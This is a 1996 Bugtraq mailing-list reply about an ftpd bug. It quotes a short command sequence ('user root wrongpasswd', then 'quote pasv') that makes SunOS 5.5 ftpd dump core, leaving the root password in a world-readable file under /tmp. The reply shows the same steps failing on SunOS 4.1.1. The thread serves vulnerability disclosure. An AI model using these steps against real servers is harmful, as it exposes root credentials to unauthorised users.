[3475] in bugtraq
Re: ftpd bug? Was: bin/1805: Bug in ftpd
daemon@ATHENA.MIT.EDU (gamble@dxcoms.cern.ch)
Wed Oct 16 13:28:04 1996
Date: Wed, 16 Oct 1996 10:04:28 +0200
Reply-To: gamble@dxcoms.cern.ch
From: gamble@dxcoms.cern.ch
X-To: Martin.Rex@sap-ag.de
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: Your message of "Tue, 15 Oct 96 18:14:08 EDT."
<199610152314.AA21264@sap-ag.de>
Doesn't work for me ... SunOS 4.1.1
SOMEWHERE>ftp sunos
220 sunos FTP server (SunOS 4.1) ready.
Connected to sunos.xxx.xx.
Name (sunos:smith):
331 Password required for smith.
Password:
230 User smith logged in.
FTP> cd /tmp
250 CWD command successful.
FTP> user root fred
530 User root access denied.
%FTP-E-LOGREJ, Login request rejected
FTP> quote pasv
421 Service not available, Remote server has closed the connection
SOMEWHERE>
and no core in /tmp
John
------------------------------------------ original message
James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?
Killing from the command line doesn't seem to work, but:
SunOS 5.5:
logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
voila, root password in world readable core dump under /tmp
-Martin
PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
so the seem to have used the proposed fix
Checking for "pw != NULL"
So this proposal was simple and obvious ... and incomplete. :)
